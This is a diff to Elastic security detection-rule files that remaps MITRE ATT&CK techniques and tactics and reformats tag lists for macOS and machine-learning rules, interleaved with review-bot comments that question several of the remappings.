@@ -99,36 +99,26 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.004" -name = "Elevated Execution with Prompt" -reference = "https://attack.mitre.org/techniques/T1548/004/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index 367e44f0902..f295bcc10c8 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
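Review bot: The new side of the `@@ -99,36 +99,26 @@` hunk in privilege_escalation_applescript_with_admin_privs.toml replaces T1548.004 "Elevated Execution with Prompt" with T1078 "Valid Accounts" under Privilege Escalation and also drops the T1059.002 "AppleScript" sub-technique. T1548.004 is ATT&CK's entry for prompting the user to elevate, and the AppleScript `with administrator privileges` clause is a pattern ATT&CK lists under it, whereas T1078 describes use of legitimate credentials, so the new mapping reads as less accurate for a rule whose name is exactly that AppleScript pattern. Keeping T1059.002 and retaining T1548.004 (alongside T1078 if both are wanted) would preserve the precise mapping; if the swap is intentional, the rule's `note` should explain the rationale.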
@@ -104,31 +104,36 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 735d71241ce..0b7b102ae56 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
@@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,36 +101,19 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + 
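Review bot: In the `@@ -94,36 +101,19 @@` hunk of privilege_escalation_local_user_added_to_admin.toml the new side maps the rule to T1078.003 "Valid Accounts: Local Accounts" and removes T1098.007 "Account Manipulation: Additional Local or Domain Groups". The hunk's context line describes `dscl`/`dseditgroup` managing group membership, which is the behaviour T1098.007 names, whereas T1078.003 covers an adversary acting through an existing local account; the same swap is made in privilege_escalation_user_added_to_admin_group.toml (Jamf Protect). Unless the intent is to map on the account used rather than on the change made, T1098.007 should be kept, under Privilege Escalation or alongside T1078.003, otherwise technique-based searches for group-membership changes no longer find these rules.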
diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml
index b9c9f402814..49a80762627 100644
--- a/rules/macos/privilege_escalation_root_crontab_filemod.toml
+++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/18"
 
 [rule]
 author = ["Elastic"]
@@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -94,36 +101,19 @@ Crontab files in macOS are used to schedule tasks, often requiring elevated priv [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index 52cfa42cab7..eb4046a403c 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.investigate]] 
@@ -84,7 +84,14 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "low" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Jamf Protect", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Jamf Protect", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,36 +103,19 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 77d18fd3e27..677898f0c23 100644 
--- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -116,23 +116,14 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 1e4fb206c9e..390ff8b41e2 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 
@@ -78,7 +78,13 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "91f02f01-969f-4167-8f55-07827ac3acc9"
 severity = "low"
-tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Initial Access", "Tactic: Reconnaissance", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Threat Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 
 note = """## Triage and analysis
@@ -117,49 +123,19 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml index 521c82e9536..8ad611b108e 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 
@@ -76,7 +76,13 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8d77-07827ac4cee0" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -115,31 +121,19 @@ User agents identify applications interacting with web servers, typically browse - Report the incident to the appropriate internal teams and, if necessary, escalate to external cybersecurity authorities or partners for further investigation and support.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index 50b24290b61..e2c5d123724 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -135,18 +135,14 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 06017cb240b..3305439fe96 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 75 
@@ -115,35 +115,48 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "e26aed74-c816-40d3-a810-48d6fbd8b2fd" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Credential Access", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index f233da07dca..af93615b61d 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml 
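Review bot: The new side of credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml moves the T1078 "Valid Accounts" entry from Initial Access (TA0001) to Defense Evasion (TA0005) and changes the tag to match. A volume anomaly of logons from one source IP is evidence that accounts are being tried or used from that source, which is the Initial Access (or Credential Access) reading of T1078; Defense Evasion is the reading where valid credentials are used to blend in, and a spike detector cannot establish that on its own. If Defense Evasion is intended, a sentence in the rule `note` explaining why would help; otherwise TA0001 with `"Tactic: Initial Access"` looks like the closer fit.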
+++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -108,40 +108,31 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Execution", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/initial_access_ml_auth_rare_user_logon.toml b/rules/ml/initial_access_ml_auth_rare_user_logon.toml index 381607c588e..47a768779c8 100644 
--- a/rules/ml/initial_access_ml_auth_rare_user_logon.toml +++ b/rules/ml/initial_access_ml_auth_rare_user_logon.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 75 @@ -116,30 +116,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "138c5dd5-838b-446e-b1ac-c995c7f8108a" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b592f2f66d1..b4a53fb620b 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -77,35 +77,26 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" 
diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml
index 881ee8ef844..3af1d24172b 100644
--- a/rules/ml/ml_high_count_events_for_a_host_name.toml
+++ b/rules/ml/ml_high_count_events_for_a_host_name.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/18"
 
 [rule]
 anomaly_threshold = 75
@@ -92,3 +92,59 @@ The detection of a spike in host-based traffic leverages machine learning to ide - Implement network segmentation to limit the spread of potential threats and reduce the impact of similar incidents in the future. - Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional resources are needed for a comprehensive response.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 108b838ecfb..39e7bd4d1f3 100644 --- a/rules/ml/ml_high_count_network_denies.toml 
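Review bot: Two of the four new stanzas claim techniques that a spike in per-host event volume cannot evidence: Privilege Escalation / T1068 Exploitation for Privilege Escalation and Execution / T1204 User Execution describe specific attacker actions, while the signal only shows "more events than usual", so these mappings inflate coverage dashboards and steer triage toward the wrong hypotheses. Impact (T1498, T1499) and, more loosely, Exfiltration / T1041 are defensible readings of a volume anomaly; suggest keeping the TA0010 and TA0040 stanzas and dropping TA0002 and TA0004 unless the investigation guide is updated to explain the link. The rule's `tags` line is outside this hunk — every tactic kept here needs a matching `Tactic: …` tag, as the persistence rules in this patch do (e.g. `"Tactic: Persistence"`), or the repository's tag/tactic consistency checks are likely to flag the rule.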
+++ b/rules/ml/ml_high_count_network_denies.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -74,7 +74,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "eaa77d63-9679-4ce3-be25-3ba8b795e5fa" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Impact", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
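Review bot: The new `tags` line drops every `Tactic:` entry (`Discovery`, `Impact`, `Reconnaissance`) while the `rule.threat` section of the same file (next hunk) grows to five tactics, so the rule no longer agrees with itself or with the rest of this patch, where tactic tags are kept in lockstep with `rule.threat` (persistence_ml_windows_anomalous_path_activity.toml adds `"Tactic: Persistence"` alongside TA0003). Either restore the tags to mirror the final tactic set — `"Tactic: Command and Control", "Tactic: Exfiltration", "Tactic: Discovery", "Tactic: Reconnaissance", "Tactic: Impact"` — or state in the commit message why tactic tags are being removed for the network ML rules only.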
